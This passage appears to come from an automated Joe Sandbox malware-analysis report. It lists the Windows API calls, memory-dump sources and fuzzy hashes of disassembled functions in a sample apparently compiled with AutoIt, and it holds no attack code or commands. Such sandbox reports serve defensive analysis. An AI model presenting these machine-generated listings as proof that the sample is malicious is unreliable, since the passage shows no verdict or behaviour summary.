                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00F878AF
                                                      • SysAllocString.OLEAUT32(?), ref: 00F878BD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: 7a1489207a2404e5de57fdccdbaa601260276028e248fcbb7d6ad5f96e0560dd
                                                      • Instruction ID: 04947de49b038f5631b2700e1528059c4c79970a40ccba1c8f67755ac4132834
                                                      • Opcode Fuzzy Hash: 7a1489207a2404e5de57fdccdbaa601260276028e248fcbb7d6ad5f96e0560dd
                                                      • Instruction Fuzzy Hash: 53216731A08208AFDB10FFA8DC88EAB77ACEB097607208125F515CB1A1D774DD41DB74
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00F904F2
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F9052E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateHandlePipe
                                                      • String ID: nul
                                                      • API String ID: 1424370930-2873401336
                                                      • Opcode ID: 0c73614693c6b08e32e33effbb04c85262042ce9e0a2aed06d85fd767ce84cfc
                                                      • Instruction ID: a5e1b92b72eaf6e9f94b8b33a24b5d772df92cbeff99098e96275d47eda33c72
                                                      • Opcode Fuzzy Hash: 0c73614693c6b08e32e33effbb04c85262042ce9e0a2aed06d85fd767ce84cfc
                                                      • Instruction Fuzzy Hash: D1218075900309AFEF209F29DC44A9A77B8AF44734F644A29F9A1D62E0DB70D940EF60
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00F905C6
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F90601
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateHandlePipe
                                                      • String ID: nul
                                                      • API String ID: 1424370930-2873401336
                                                      • Opcode ID: 045c5dae1ee8e33877c3ff6b22d82c152ba4e6120ff4b0746d5fd2f13832ad22
                                                      • Instruction ID: 30d72d801bf379693e195751a661ca449497f8d2a01b861aa69adefae9aeebb1
                                                      • Opcode Fuzzy Hash: 045c5dae1ee8e33877c3ff6b22d82c152ba4e6120ff4b0746d5fd2f13832ad22
                                                      • Instruction Fuzzy Hash: 482131759003059FEF209F699C44A9A77E8AF95734F200B19F8A1E72E0DB709960EF60
                                                      APIs
                                                        • Part of subcall function 00F2600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F2604C
                                                        • Part of subcall function 00F2600E: GetStockObject.GDI32(00000011), ref: 00F26060
                                                        • Part of subcall function 00F2600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F2606A
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00FB4112
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00FB411F
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00FB412A
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00FB4139
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00FB4145
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: 4911d29f08ec2838384401730cdfcc7990eb566ce27d41d8da47e75b8fe8bf51
                                                      • Instruction ID: 9d453a57bd2c26d88f725e088275821458323eb543da1f52bec630a9324ec6b7
                                                      • Opcode Fuzzy Hash: 4911d29f08ec2838384401730cdfcc7990eb566ce27d41d8da47e75b8fe8bf51
                                                      • Instruction Fuzzy Hash: CE11B2B255021DBEEF119F65CC85EE77F5DEF087A8F004111BA18A20A0C676DC21EBA4
                                                      APIs
                                                        • Part of subcall function 00F5D7A3: _free.LIBCMT ref: 00F5D7CC
                                                      • _free.LIBCMT ref: 00F5D82D
                                                        • Part of subcall function 00F529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000), ref: 00F529DE
                                                        • Part of subcall function 00F529C8: GetLastError.KERNEL32(00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000,00000000), ref: 00F529F0
                                                      • _free.LIBCMT ref: 00F5D838
                                                      • _free.LIBCMT ref: 00F5D843
                                                      • _free.LIBCMT ref: 00F5D897
                                                      • _free.LIBCMT ref: 00F5D8A2
                                                      • _free.LIBCMT ref: 00F5D8AD
                                                      • _free.LIBCMT ref: 00F5D8B8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                                      • Instruction ID: c1c9034bcaec64ba6238a0d632596cb3498d724c264ee73809417d0f198d4aa7
                                                      • Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                                      • Instruction Fuzzy Hash: 9C118171542B04AAD531BFB0DC07FCB7BECAF09702F400825BB99A6992DA28B5097650
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F8DA74
                                                      • LoadStringW.USER32(00000000), ref: 00F8DA7B
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F8DA91
                                                      • LoadStringW.USER32(00000000), ref: 00F8DA98
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F8DADC
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00F8DAB9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 4072794657-3128320259
                                                      • Opcode ID: 4e00f4c6602f6ff4c8826a5f0595324281977062d23405590e644eb420286dce
                                                      • Instruction ID: 439d7e4ca888c51730912e9d41b65488c636c56e6304183acbd5a6d87b94380f
                                                      • Opcode Fuzzy Hash: 4e00f4c6602f6ff4c8826a5f0595324281977062d23405590e644eb420286dce
                                                      • Instruction Fuzzy Hash: 260162F690020C7FE711ABA49DC9EE7376CEB08701F401591B706E2082EA749E845FB4
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(011FE858,011FE858), ref: 00F9097B
                                                      • EnterCriticalSection.KERNEL32(011FE838,00000000), ref: 00F9098D
                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 00F9099B
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00F909A9
                                                      • CloseHandle.KERNEL32(00000000), ref: 00F909B8
                                                      • InterlockedExchange.KERNEL32(011FE858,000001F6), ref: 00F909C8
                                                      • LeaveCriticalSection.KERNEL32(011FE838), ref: 00F909CF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: cfaab036af863e3ff759a9b94b10c8b4bfdbf64206c275773e2bf2c1fc9bc14c
                                                      • Instruction ID: 7ab3afad73587a50980d3b7a43983058e685f1d82323e4e2625fa03261f088c9
                                                      • Opcode Fuzzy Hash: cfaab036af863e3ff759a9b94b10c8b4bfdbf64206c275773e2bf2c1fc9bc14c
                                                      • Instruction Fuzzy Hash: 12F01D31442516BBEB455F94EEC8AD77A35BF01712F401126F101508A0CB749865EFD0
                                                      APIs
                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00FA1DC0
                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00FA1DE1
                                                      • WSAGetLastError.WSOCK32 ref: 00FA1DF2
                                                      • htons.WSOCK32(?,?,?,?,?), ref: 00FA1EDB
                                                      • inet_ntoa.WSOCK32(?), ref: 00FA1E8C
                                                        • Part of subcall function 00F839E8: _strlen.LIBCMT ref: 00F839F2
                                                        • Part of subcall function 00FA3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00F9EC0C), ref: 00FA3240
                                                      • _strlen.LIBCMT ref: 00FA1F35
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                      • String ID:
                                                      • API String ID: 3203458085-0
                                                      • Opcode ID: 00a81ebc422b7d3d8f977bb61f1ffe91bc03f9ba2248ba4340cc16c55a5b71a2
                                                      • Instruction ID: c6db0c4b0181e0dc0c029f744f350106a2dacea82352046a52da274fd2a5b1b9
                                                      • Opcode Fuzzy Hash: 00a81ebc422b7d3d8f977bb61f1ffe91bc03f9ba2248ba4340cc16c55a5b71a2
                                                      • Instruction Fuzzy Hash: B8B1EEB1604340AFC324DF24C885E2A7BA5BF86328F59894CF4565F2E2CB75ED42DB91
                                                      APIs
                                                      • __allrem.LIBCMT ref: 00F500BA
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F500D6
                                                      • __allrem.LIBCMT ref: 00F500ED
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F5010B
                                                      • __allrem.LIBCMT ref: 00F50122
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F50140
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 1992179935-0
                                                      • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                      • Instruction ID: 922e66ca6cca66997b7de849cab636d4a02fdc4fa1ca39585706ac666ac2c7f7
                                                      • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                      • Instruction Fuzzy Hash: 31810872A00B069BE7209F28CC41B6B77E8AF41335F24423AFE55D66C1EB74D908A791
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F482D9,00F482D9,?,?,?,00F5644F,00000001,00000001,8BE85006), ref: 00F56258
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F5644F,00000001,00000001,8BE85006,?,?,?), ref: 00F562DE
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F563D8
                                                      • __freea.LIBCMT ref: 00F563E5
                                                        • Part of subcall function 00F53820: RtlAllocateHeap.NTDLL(00000000,?,00FF1444,?,00F3FDF5,?,?,00F2A976,00000010,00FF1440,00F213FC,?,00F213C6,?,00F21129), ref: 00F53852
                                                      • __freea.LIBCMT ref: 00F563EE
                                                      • __freea.LIBCMT ref: 00F56413
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1414292761-0
                                                      • Opcode ID: d14bc59d9aa301663996e5ce39c548373be00b67312eb692824f584ad5e93384
                                                      • Instruction ID: b36ee0ae88990c3799f2a9c35e83a3360154bd4d97bfda616bb4ae0b2594d6ed
                                                      • Opcode Fuzzy Hash: d14bc59d9aa301663996e5ce39c548373be00b67312eb692824f584ad5e93384
                                                      • Instruction Fuzzy Hash: EC51E672A00216ABDF258F64CC81FAF77A9EF44761F544629FE25D7240DB34DC48E6A0
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                        • Part of subcall function 00FAC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FAB6AE,?,?), ref: 00FAC9B5
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FAC9F1
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FACA68
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FACA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FABCCA
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FABD25
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FABD6A
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00FABD99
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00FABDF3
                                                      • RegCloseKey.ADVAPI32(?), ref: 00FABDFF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                      • String ID:
                                                      • API String ID: 1120388591-0
                                                      • Opcode ID: 1ff54e2aac966a1acf34b7b538fa72fc0fced8a7d0df1b09887a0445b2b7d82d
                                                      • Instruction ID: 2bb48b1f284a403540cea2757a2f2fb31ffe76a321fdf42389f9c8e162b9aec0
                                                      • Opcode Fuzzy Hash: 1ff54e2aac966a1acf34b7b538fa72fc0fced8a7d0df1b09887a0445b2b7d82d
                                                      • Instruction Fuzzy Hash: 2781C071608241EFC714DF24C885E2ABBE5FF85318F14896CF4598B2A2CB31ED45EB92
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000035), ref: 00F7F7B9
                                                      • SysAllocString.OLEAUT32(00000001), ref: 00F7F860
                                                      • VariantCopy.OLEAUT32(00F7FA64,00000000), ref: 00F7F889
                                                      • VariantClear.OLEAUT32(00F7FA64), ref: 00F7F8AD
                                                      • VariantCopy.OLEAUT32(00F7FA64,00000000), ref: 00F7F8B1
                                                      • VariantClear.OLEAUT32(?), ref: 00F7F8BB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                      • String ID:
                                                      • API String ID: 3859894641-0
                                                      • Opcode ID: 179accac84530a4a02d3f17dc9ffff6dcb4934998cfc3d221efd427ac2a352ff
                                                      • Instruction ID: bfda1790a44cc3293150699ee8232dfbccb720338e25014a521568a596e1c3ac
                                                      • Opcode Fuzzy Hash: 179accac84530a4a02d3f17dc9ffff6dcb4934998cfc3d221efd427ac2a352ff
                                                      • Instruction Fuzzy Hash: C151B531900310BADF20AB65DC95B69B3A4EF45320F24D467E909EF291DB748C48EBA7
                                                      APIs
                                                        • Part of subcall function 00F27620: _wcslen.LIBCMT ref: 00F27625
                                                        • Part of subcall function 00F26B57: _wcslen.LIBCMT ref: 00F26B6A
                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00F994E5
                                                      • _wcslen.LIBCMT ref: 00F99506
                                                      • _wcslen.LIBCMT ref: 00F9952D
                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00F99585
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$FileName$OpenSave
                                                      • String ID: X
                                                      • API String ID: 83654149-3081909835
                                                      • Opcode ID: e9566647041af99700f759f6736ba16c5f829f36d1ca010c1d29c9fb37cf4258
                                                      • Instruction ID: de44016734966bcd7019cbf4569edb6271a5a48980594ec68dbfbdf2e55bf6cf
                                                      • Opcode Fuzzy Hash: e9566647041af99700f759f6736ba16c5f829f36d1ca010c1d29c9fb37cf4258
                                                      • Instruction Fuzzy Hash: 05E1C4319083509FDB24DF28D881F6AB7E4BF84310F05896DF8899B2A2DB75DD05DB92
                                                      APIs
                                                        • Part of subcall function 00F39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F39BB2
                                                      • BeginPaint.USER32(?,?,?), ref: 00F39241
                                                      • GetWindowRect.USER32(?,?), ref: 00F392A5
                                                      • ScreenToClient.USER32(?,?), ref: 00F392C2
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F392D3
                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00F39321
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F771EA
                                                        • Part of subcall function 00F39339: BeginPath.GDI32(00000000), ref: 00F39357
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                      • String ID:
                                                      • API String ID: 3050599898-0
                                                      • Opcode ID: 077443772db0868c157b770f01fe2046b82060a4c13ff61ed35a3fd854899c93
                                                      • Instruction ID: 30d485ad3e3d399ab8d380c084d198f020e2e1d89d74b59e903049c9d9dcc392
                                                      • Opcode Fuzzy Hash: 077443772db0868c157b770f01fe2046b82060a4c13ff61ed35a3fd854899c93
                                                      • Instruction Fuzzy Hash: CF41AC71508304AFD721EF24CC84FBB7BA8EF45370F140269F999972A1C7B19845EBA2
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F9080C
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00F90847
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00F90863
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00F908DC
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00F908F3
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F90921
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3368777196-0
                                                      • Opcode ID: 5ceb1d398eeb4d26b8f2cf3cfe74cc5d7d60cf1b529f383bfb44e2bf4c09b150
                                                      • Instruction ID: c469cdab8d6a5bce70f73ac7ecffd82dc3df58ea0a56f421e6e8bd1d1894b432
                                                      • Opcode Fuzzy Hash: 5ceb1d398eeb4d26b8f2cf3cfe74cc5d7d60cf1b529f383bfb44e2bf4c09b150
